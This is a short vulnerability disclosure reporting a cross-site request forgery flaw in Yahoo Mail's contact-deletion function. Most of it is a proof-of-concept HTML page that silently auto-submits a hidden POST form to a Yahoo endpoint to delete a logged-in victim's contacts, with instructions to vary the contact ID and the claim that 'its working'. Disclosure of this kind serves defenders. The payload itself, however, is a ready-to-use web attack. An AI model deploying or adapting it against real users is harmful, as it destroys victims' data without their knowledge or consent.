=======================================================================
   
                                                    YAHOOMAIL CSRF Vulnerability
 
                                =======================================================================
   
                                                              
 
  # Vulnerability found in- Yahoomail  Delete Contact module
   
  # email         prakhar.agrawal26@gmail.com
   
  # company       AKS IT Services Pvt. Ltd
   
  # Credit by     Prakar Agrawal
 
  # Email Service      Yahoomail      

  # Category  	  Mail service
  
  # Site p4ge     http://www.yahoomail.com
  
  # Plateform     java
  
   
  #  Proof of concept   #
 
  Targeted URL:  http://address.mail.yahoo.com/
  
 
   Script to Delete the contacts from  contact list through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>
                            <body>
                                  <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
                                  <input type=hidden name="action" value="delete_contacts">
                                  <input type=hidden name="id" value="$Numeric No.$">
                                  </form>
                                  <script>document.csrf.submit();</script>
                            </body>
                        </html>

   
             .  ..................................................................................................................
   
     Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....

   # If you have any questions, comments, or concerns, feel free to contact me.